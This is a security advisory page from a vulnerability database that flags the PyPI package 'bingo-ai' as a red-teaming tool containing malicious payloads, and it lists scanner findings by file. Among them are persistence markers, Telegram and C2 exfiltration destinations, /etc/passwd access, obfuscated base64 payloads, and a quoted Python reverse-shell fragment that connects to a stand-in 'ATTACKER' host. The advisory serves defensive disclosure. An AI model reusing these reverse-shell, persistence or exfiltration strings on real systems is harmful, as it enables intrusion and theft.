VDB

GCVE-110-OSM-2026-7718

GCVE-110-OSM-2026-7718
Advisory PublishedCVSS 5.4/10
Vulnetix · Advisory published July 10, 2026
This package is described as a Red Teaming tool and that's what it appears to be. As such it includes many malicious payloads. We are flagging it as an "informational" as you would only want to install this as a offensive security professional. If you see this downloaded into your environment outside of that context, you should probably alert your security team. ENTRY pypi/bingo-ai@6.2.82/bingo/cli.py (console-script: bingo=bingo.cli:main) LOOT - Browser Data Theft in pypi/bingo-ai@6.2.82/bingo/skills/skills_data2.py: "AppData/Local/Google" PERSISTENCE - Cron Job Persistence in pypi/bingo-ai@6.2.82/bingo/skills/skills_data.py: "crontab -" - Startup Persistence in pypi/bingo-ai@6.2.82/bingo/skills/skills_data.py: ".bashrc" - Cron Job Persistence in pypi/bingo-ai@6.2.82/bingo/skills/skills_data2.py: "crontab -" - Cron Job Persistence in pypi/bingo-ai@6.2.82/bingo/skills/skills_data3.py: "crontab -" - Cron Job Persistence in pypi/bingo-ai@6.2.82/bingo/skills/skills_data5.py: "/etc/cron" - Startup Persistence in pypi/bingo-ai@6.2.82/bingo/skills/skills_data5.py: "Startup/" - Startup Persistence in pypi/bingo-ai@6.2.82/bingo/tools/apk_secret_scanner.py: ".zshrc" - Startup Persistence in pypi/bingo-ai@6.2.82/bingo/tools/burp_engine.py: "Startup/" (+4 more) DESTINATION - telegram-bot: api.telegram.org/bot{token}/sendMessage (primary, plaintext) in pypi/bingo-ai@6.2.82/bingo/tools/webhook_reporter.py - oast: http://spoofed.burpcollaborator.net (plaintext) in pypi/bingo-ai@6.2.82/bingo/skills/local_skills/SecSkills-main/references/web-ssrf.md - custom-c2: https://{self.config.fronting_host (plaintext) in pypi/bingo-ai@6.2.82/bingo/core/apt/c2_channel.py - custom-c2: https://... (plaintext) in pypi/bingo-ai@6.2.82/bingo/core/execution_anchor.py - custom-c2: https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-... (plaintext) in pypi/bingo-ai@6.2.82/bingo/core/exploits/mitel_micollab.py - custom-c2: https://{target (plaintext) in pypi/bingo-ai@6.2.82/bingo/core/phantom_guard.py - custom-c2: https://ipecho.net/plain (plaintext) in pypi/bingo-ai@6.2.82/bingo/core/proxy_hunter.py - custom-c2: https://free-proxy-list.net/ (plaintext) in pypi/bingo-ai@6.2.82/bingo/core/proxy_hunter.py (+44 more) EXFIL - Sensitive File Access in pypi/bingo-ai@6.2.82/bingo/core/exploits/mitel_micollab.py: ""/etc/passwd"" - Sensitive File Access in pypi/bingo-ai@6.2.82/bingo/models/system_prompt.py: "'/etc/passwd'" - Reverse Shell in pypi/bingo-ai@6.2.82/bingo/skills/skills_data.py: "/bin/sh -i" - OAST/Interactsh Exfiltration in pypi/bingo-ai@6.2.82/bingo/skills/skills_data14.py: ".oast.fun" - Sensitive File Access in pypi/bingo-ai@6.2.82/bingo/skills/skills_data3.py: "'/etc/passwd'" - OAST/Interactsh Exfiltration in pypi/bingo-ai@6.2.82/bingo/skills/skills_data5.py: "oast.site" - Reverse Shell in pypi/bingo-ai@6.2.82/bingo/skills/skills_data7.py: "socket.socket();s.connect(('ATTACKER',4444));os.dup2(s.fileno(),0);os.dup2(s.fil..." - Sensitive File Access in pypi/bingo-ai@6.2.82/bingo/tools/api_fuzzer.py: ""/etc/passwd"" (+155 more) OBFUSCATION - Decoded Base64 Content in pypi/bingo-ai@6.2.82/bingo/tools/deserialize_tester.py - Base64 Encoded Payload in pypi/bingo-ai@6.2.82/bingo/tools/deserialize_tester.py: ""/wEykQUAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJ..." - Unicode Escape Obfuscation in pypi/bingo-ai@6.2.82/bingo/tools/upload_bypass.py: "\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02" - Unicode Escape Obfuscation in pypi/bingo-ai@6.2.82/bingo/tools_ext/autoexploit_modules.py: "\x80\x04\x95\x1a\x00\x00\x00\x00\x00\x00\x00\x8c\x02" - Decoded Base64 Content in pypi/bingo-ai@6.2.82/bingo/knowledge/base/JWT/jwt-attacks.md - Decoded Base64 Content in pypi/bingo-ai@6.2.82/bingo/skills/hack-skills/jwt-oauth-token-attacks/SKILL.md (x2) - Decoded Base64 Content in pypi/bingo-ai@6.2.82/bingo/skills/local_skills/SecSkills-main/references/web-dir-traversal.md - Decoded Base64 Content in pypi/bingo-ai@6.2.82/bingo/skills/local_skills/advsec-plus/references/evasion-advanced.md (+2 more) ADDITIONAL FINDINGS - Base64 Decoded Eval in pypi/bingo-ai@6.2.82/bingo/skills/skills_data14.py: "eval(atob(" - Shell Command Execution in pypi/bingo-ai@6.2.82/bingo/cli.py: "os.system(" - Suspicious TLD Domain in pypi/bingo-ai@6.2.82/bingo/core/apt/phishing.py: "https://{self.c2_host}/login?token={self._make_token(target.email" - Silent Process Execution in pypi/bingo-ai@6.2.82/bingo/core/exploits/glibc_tunables.py: "stderr=subprocess.DEVNULL" - Dangerous Function Calls in pypi/bingo-ai@6.2.82/bingo/models/system_prompt.py: "pickle.load(" - Shell Command Variable Setup in pypi/bingo-ai@6.2.82/bingo/skills/skills_data.py: "Windows: cmd /c whoami, powersh" (+2 more) PAYLOAD FILES pypi/bingo-ai@6.2.82/bingo/skills/skills_data3.py (+ pypi/bingo-ai@6.2.82/bingo/models/system_prompt.py, pypi/bingo-ai@6.2.82/bingo/tools_ext/autoexploit_modules.py) INDICATORS (IOCs) - ipv4: 5.6.7.8, 9.10.11.12, 13.14.15.16, 9.9.9.9, 2.2.2.2 (+8 more) - ipv6: fd00:ec2::, 0:0::, fc00:: - urls: https://app.defi-protocol.com, http://ip:port`, http://user:pass@ip:port`, https://ip:port`, https://api.proxyscrape.com/v3/... (+26 more) - domains: app.uniswap.org, bgp.he.net, c2.attacker.com, cdn.attacker.com, target1.com (+10 more) - emails: attacker@your-c2.com, ADMINS@DOMAIN.LOCAL, phish@your-server.com, legitimate.com@attacker.com, attacker@attacker.com (+23 more) - sha256Hashes: 0000000000000000000000000000000000000000000000000000000000000000, 89504e470d0a1a0a0000000d49484452000000010000000108060000001f15c4 - ips: 2.0.0.0 - payloadFileHash: 281a4566bb68e05eae87402dcb05085833c43a78e37a4fb17fe9996b5fb6859f

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
5.4/10
Medium · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Affected Products

VendorProductVersionsPlatforms
unknownbingo-aiall (affected)

References

vendor

Browse GCVE Records

72,096 records in the GCVE database · Updated July 14, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›